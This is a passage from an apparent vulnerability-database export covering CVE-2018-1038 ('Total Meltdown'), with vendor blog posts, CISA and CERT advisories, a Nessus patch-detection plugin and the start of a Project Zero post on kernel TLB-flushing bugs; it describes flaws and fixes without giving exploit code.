continues\u2026\n\nLate Thursday, Microsoft released a patch for Windows 7 and Server 2008 R2 operating systems to resolve [CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>). Apparently, this vulnerability was actually introduced by the patches released in January to mitigate the effects of Meltdown. 
Microsoft did include a partial fix in the [March updates](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/13/march-patch-tuesday-75-microsoft-vulnerabilities-2-for-adobe>) on [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), but did not completely resolve the issue.\n\nAccording to a [blog post by Ulf Frisk](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>), some of the modifications to memory handling opened up read/write access to the kernel's page tables from user mode, essentially allowing any application on the machine to read and write arbitrary physical memory.\n\nQualys has created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). This detection requires authenticated scanning or a [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset, and looks for the presence of the vulnerable version of ntoskrnl.exe. \n\nIt should be noted that while there are no current active attacks against this vulnerability, there _is_ PoC code, and opportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset.\n\n**The bottom line**: If you installed any of the security updates from January of this year or later, it is critical that you install this out-of-band patch to ensure your systems are protected from malicious actors. 
Also ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile.", "modified": "2018-03-30T19:05:27", "published": "2018-03-30T19:05:27", "id": "QUALYSBLOG:825B1704EC215DE72477ABECB37BD7CB", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night", "type": "qualysblog", "title": "A \u201cPatch for the Meltdown Patch\u201d released out of band Thursday night", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1038", "CVE-2018-7600"], "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. 
The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). 
Detection requires authenticated scanning or a [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account in which they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019 [Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman makes a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of \u201cbcrypt\u201d hashing function) and not so well (use of SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. 
The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was[ quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows OS vulnerabilities that Microsoft patched in March 2017, so more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute remote code in affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. 
Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. 
Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal 
[warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. 
\n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious[ ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. 
Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "modified": "2018-04-02T18:02:51", "published": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cisa": [{"lastseen": "2020-12-18T18:07:18", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "Microsoft has released security updates to address a vulnerability in Windows 7 x64 and Windows Server 2008 R2 x64 systems. 
Exploitation of this vulnerability may allow an attacker to take control of an affected system.\n\nNCCIC/US-CERT encourages users and administrators to review [Vulnerability Note VU#277400](<https://www.kb.cert.org/vuls/id/277400>) and [Microsoft\u2019s Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>) for more information and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n", "modified": "2018-03-29T00:00:00", "published": "2018-03-29T00:00:00", "id": "CISA:3D3E239B3E90E3844001DB05F0A3EA02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/03/29/Microsoft-Release-Patch-Windows-7-and-Windows-Server-2008-R2", "type": "cisa", "title": "Microsoft Release Patch for Windows 7 and Windows Server 2008 R2 Systems", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-18T04:54:23", "description": "The remote Windows host is missing security update 4100480. It is,\ntherefore, affected by an elevation of privilege vulnerability that\nexists when the Windows kernel fails to properly handle objects in\nmemory. An attacker who successfully exploited this vulnerability\ncould run arbitrary code in kernel mode. An attacker could then\ninstall programs; view, change, or delete data; or create new\naccounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log\non to the system. An attacker could then run a specially crafted\napplication to take control of an affected system. 
", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-30T00:00:00", "title": "KB4100480: Windows Kernel Elevation of Privilege Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1038"], "modified": "2018-03-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_MAR_4100480.NASL", "href": "https://www.tenable.com/plugins/nessus/108757", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108757);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/17\");\n\n script_cve_id(\"CVE-2018-1038\");\n script_xref(name:\"MSKB\", value:\"4100480\");\n script_xref(name:\"MSFT\", value:\"MS18-4100480\");\n\n script_name(english:\"KB4100480: Windows Kernel Elevation of Privilege Vulnerability\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by elevation of privilege vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4100480. It is,\ntherefore, affected by an elevation of privilege vulnerability that\nexists when the Windows kernel fails to properly handle objects in\nmemory. An attacker who successfully exploited this vulnerability\ncould run arbitrary code in kernel mode. An attacker could then\ninstall programs; view, change, or delete data; or create new\naccounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log\non to the system. An attacker could then run a specially crafted\napplication to take control of an affected system. 
\");\n # https://support.microsoft.com/en-us/help/4100480/windows-kernel-update-for-cve-2018-1038\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a34a061\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.frizk.net/2018/03/total-meltdown.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/ufrisk/pcileech\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply KB4100480.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1038\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\narch = get_kb_item_or_exit('SMB/ARCH');\nif (arch != \"x64\") audit(AUDIT_ARCH_NOT, \"x64\", arch);\n\nbulletin = \"MS18-03\";\nkbs = make_list('4100480');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# 4100480 got superseded by a sec only update, 4093108\nif (get_kb_item(\"smb_rollup/04_2018/sec\") == \"4093108\") audit(AUDIT_HOST_NOT, \"affected\");\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"03_2018_3\",\n bulletin:bulletin,\n rollup_kb_list:[4100480])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "### Overview \n\nWhen the Microsoft [update for meltdown](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180002>) is installed on a Windows 7 x64 or Windows 
Server 2008 R2 x64 system, an unprivileged process may be able to read and write the entire memory space available to the Windows kernel.\n\n### Description \n\nThe update that Microsoft has released for [meltdown](<https://www.kb.cert.org/vuls/id/584653>) on x64 versions of Windows 7 and Windows Server 2008 R2 incorrectly sets the permission bit for memory accessible from unprivileged user space. As a result, such platforms with the meltdown update (released in January 2018) installed do not properly protect the contents of system memory. \n \n--- \n \n### Impact \n\nAn attacker with the ability to run code on an affected platform as an unprivileged user may be able to read from and write to the entire contents of system memory. Exploit code that uses this vulnerability to escalate privileges from an unprivileged user to SYSTEM privileges is publicly available. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in the [Microsoft update for CVE-2018-1038](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>). \n \n--- \n \n### Vendor Information\n\n
### Microsoft Affected\n\nUpdated: March 29, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.9 | E:H/RL:OF/RC:C \nEnvironmental | 5.9 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n\n### References \n\n * <http://blog.frizk.net/2018/03/total-meltdown.html>\n * <https://blog.xpnsec.com/total-meltdown-cve-2018-1038/>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by Ulf Frisk.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-1038](<http://web.nvd.nist.gov/vuln/detail/CVE-2018-1038>) \n---|--- \n**Date Public:** | 2018-03-27 \n**Date First Published:** | 2018-03-29 \n**Date Last Updated:** | 2018-04-24 14:47 UTC \n**Document Revision:** | 25 \n", "modified": "2018-04-24T14:47:00", "published": "2018-03-29T00:00:00", "id": "VU:277400", "href": "https://www.kb.cert.org/vuls/id/277400", "type": "cert", "title": "Windows 7 and Windows Server 2008 R2 x64 fail to protect kernel memory when the Microsoft update for meltdown is installed", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:16", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2017-15588", "CVE-2018-1038", "CVE-2018-18281"], "description": "Posted by Jann Horn, Project Zero\n\nThis is a technical blog post about TLB flushing bugs in kernels, intended for people interested in kernel security and memory management.\n\n# Introduction: Bugs in 
Memory Management code\n\nThere have been some pretty scary bugs in memory management in the past, like:\n\n * [CVE-2016-5195](<https://dirtycow.ninja/>), a logic bug in the Linux kernel that permitted writing to shared read-only pages\n\n * [CVE-2018-1038](<http://blog.frizk.net/2018/03/total-meltdown.html>), a Windows bug that existed for about two months, where a bit was set incorrectly in a page table, permitting userspace to overwrite page tables\n\nMemory management is one of the core functions that every kernel and hypervisor needs to implement; and the correctness of memory management code is very important to the security of the entire system. I hope that this post encourages more researchers to look at memory management code and demonstrates that memory management code can have issues with high security impact that fall somewhat outside of the typical security bug patterns.\n\nThis blog post focuses on memory management bugs related to TLB flushing. Such bugs can, if the timing works out for the attacker, provide very strong exploitation primitives for local attacks; and they are hard to discover unless you are manually looking for them. 
They are probably not a big bug class, but occasionally, bugs in TLB flushing logic do happen.\n\nHere are the bugs related to TLB flushing that I have (co-)discovered:\n\n * Xen PV: [XSA-241](<https://xenbits.xen.org/xsa/advisory-241.html>): \"Stale TLB entry due to page type release race\" (CVE-2017-15588) (security impact discovered by Xen security team)\n\n * Linux: insufficient shootdown for paging-structure caches ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1633>))\n\n * gVisor: pagetable reuse across levels without paging-structure invalidation ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1674>))\n\n * [XNU: pmap_flush() omits TLB flushes on machines with >32 logical CPU cores ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1716>)) - this was already fixed in a binary release when I reported it, so it doesn't really count]\n\n * Linux: mremap() TLB flush too late with concurrent ftruncate() ([link](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695>)) (CVE-2018-18281)\n\nThis blog post focuses on the last bug in the list.\n\nBy the way: Note that the gVisor bug is in memory management code written in Go, which is memory-safe[-ish](<https://blog.stalkr.net/2015/04/golang-data-races-to-break-memory-safety.html>). This demonstrates that in operating system code, \"logic bugs\" in some places, like page table management, can have consequences that are as severe as those of classical memory safety issues, and are not in the scope of the language's safety guarantees. 
Of course, memory-safe languages are still highly useful because they (should) prevent bugs in random, non-critical pieces of kernel code from corrupting completely unrelated system state, and they allow reviewers to spend more time on the security-critical parts of the system.\n\n# Introduction: TLBs and paging-structure caches\n\nIf you know what a TLB is, what a TLB flush is, what paging-structure caches are, and how paging-structure caches are managed, you can skip this section. This section does not exhaustively describe the topic of TLB management; in particular, it doesn't deal with processor features like global page table entries and PCID/ASID.\n\nPage tables contain information on how virtual addresses map to physical ones. Page tables are stored in memory, so they are comparatively slow to access; to make address translation fast, CPUs use caches. The classic caches for this are called Translation Lookaside Buffers (TLBs); they cache mappings from virtual to physical page addresses (including mappings for huge pages), or in other words, they (more or less) cache last-level page table entries. (Modern CPU cores often have multiple TLBs with different responsibilities, e.g. Intel CPUs have an instruction TLB, a data TLB and a shared L2 TLB.) 
TLB parameters are usually fairly well-documented; for example:\n\n * Intel's [Optimization Reference Manual](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf>) has information about TLB structure in the \"Cache and Memory Subsystem\" subsections for various processor generations\n\n * Arm documents the TLB parameters of their cores in [their processor documentation](<http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.set.cortexa/index.html>), in the Technical Reference Manual for the core, under \"Memory Management Unit > TLB organization\".\n\n * AMD publishes TLB parameters in their [Software Optimization Guides](<https://developer.amd.com/resources/developer-guides-manuals/>).\n\nPaging-structure caches are usually less well-documented; but there is official documentation about their existence and necessary precautions when dealing with them. Intel calls them \"Paging-Structure Caches\", Arm calls them \"Intermediate table walk caches\", AMD documents them as part of the L2 data TLB (at least for 17h processors). Paging-structure caches store copies of non-last-level page table entries; they are used when a virtual address without a corresponding TLB entry is being accessed, and they reduce the number of memory accesses for a page table walk. There are some reverse-engineered details about the paging-structure caches of various processors in [a VUSec paper](<https://www.cs.vu.nl/~herbertb/download/papers/revanc_ir-cs-77.pdf>) (in Table 1).\n\nIt generally has to be assumed that entries in TLBs and paging-structure caches can be evicted by the processor whenever it wants to. 
Similarly, it has to be assumed that a processor can create entries in TLBs and paging-structure caches from page table entries whenever it wants to, because memory accesses in speculatively executed code can create such entries.\n\nMechanisms to invalidate TLB entries and paging-structure caches differ between processor architectures:\n\nX86 provides instructions to invalidate either individual TLB entries for the current logical CPU core, or to invalidate the entire TLB (either with or without global entries) for the current logical CPU core. Invalidating the TLB entry for a virtual address also at least implies invalidation of any paging-structure cache entries that could be used for translating that virtual address. The Intel SDM documents this in volume 3A, chapter 4.10.4 (\"Invalidation of TLBs and Paging-Structure Caches\"). (The SDM says that INVLPG invalidates all paging-structure caches, but doesn't make such broad guarantees for individual-address INVPCID as far as I can tell.) To perform TLB invalidation across logical CPU cores, an operating system has to manually run code that invalidates TLB entries on each logical CPU core; this is normally implemented by sending Inter-Processor Interrupts (via APIC) from the processor that wants to perform a TLB invalidation to all other processors that might have relevant stale TLB or paging-structure cache entries.\n\nThe ARM architecture provides magic instructions that can perform cross-core TLB invalidation for you; however, if you also need to synchronize against page table walks implemented in software (like the Linux kernel), you may have to send IPIs anyway (depending on the synchronization mechanism used for page table walks).\n\nThe general code pattern for performing cache invalidations for page table entries is:\n\n 1. Remove an entry from a page table, but keep holding a reference to the physical page it points to.\n\n 2. 
Perform a TLB flush (either for a specific address, or for the entire address space) across all cores that might be using the same page tables as the current thread.\n\n 3. Drop the reference that was held on the physical page, potentially freeing it.\n\nThis pattern is the same both when unmapping normal data pages and when removing page tables. It can often be batched for better performance - first remove multiple page table entries, then do one TLB flush across cores, then drop all the page references -, but for the mapping of an individual page (including page tables), this pattern is generally true.\n\nOn X86 (but ARM64 is similar), there are two bits in a last-level PTE which the CPU can write into as part of address translation: The Accessed bit specifies whether the CPU has ever used the page table entry for address translation; in other words, if the Accessed bit is unset, the value of the page table entry has not been cached by the TLB since the last time the page table entry was written by software. The Dirty bit specifies whether the CPU has ever used the page table entry for a writing memory access; in other words, if the Dirty bit is unset, no TLB entries that can be used to write to the physical page have been created since the last software write to the PTE.\n\n# Linux: mremap() TLB flush too late\n\n## The bug\n\nOn Linux, memory management data structures of a process are protected by multiple locks; in particular, the read/write semaphore mmap_sem in struct mm_struct is used to protect the VMA (virtual memory area) structures, and page table locks (if the kernel is configured normally, implemented using per-page-table spinlocks for lower-level page tables) are used to protect access to page tables. Accesses to the page tables of a process for syscalls such as mmap()/mremap()/munmap(), as well as syscalls for page fault handling, use both the mmap_sem and page table locks. However, some other types of page table access (e.g. 
